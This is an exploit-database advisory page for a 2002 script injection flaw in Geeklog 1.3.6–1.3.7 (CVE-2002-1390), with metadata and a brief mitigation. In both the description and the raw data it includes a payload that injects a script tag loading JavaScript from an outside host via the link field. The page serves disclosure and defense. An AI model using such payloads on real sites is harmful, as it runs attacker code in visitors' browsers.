header-logo
Suggest Exploit
vendor:
Geeklog
by:
Alper
7.5
CVSS
HIGH
Script Injection
79
CWE
Product Name: Geeklog
Affected Version From: Geeklog 1.3.6
Affected Version To: Geeklog 1.3.7
Patch Exists: YES
Related CWE: CVE-2002-1390
CPE: o:geeklog:geeklog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

Geeklog Script Injection Vulnerability

Geeklog does not sufficiently sanitize script code from form fields, making it prone to script injection attacks. Attacker-supplied script code may potentially end up in webpages generated by Geeklog and will execute in the browser of a user who views such pages, in the security context of the website. Example: Link input($url) :<scriptsrc="http://forum.olympos.org/f.js">Alper</script>

Mitigation:

Input validation should be used to ensure that user-supplied data does not contain malicious code.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4974/info

Geeklog does not sufficiently sanitize script code from form fields, making it prone to script injection attacks.

Attacker-supplied script code may potentially end up in webpages generated by Geeklog and will execute in the browser of a user who views such pages, in the security context of the website. 

Link input($url) :<scriptsrc="http://forum.olympos.org/f.js">Alper</script>

Navigation

Suggest Exploit

Services By CQR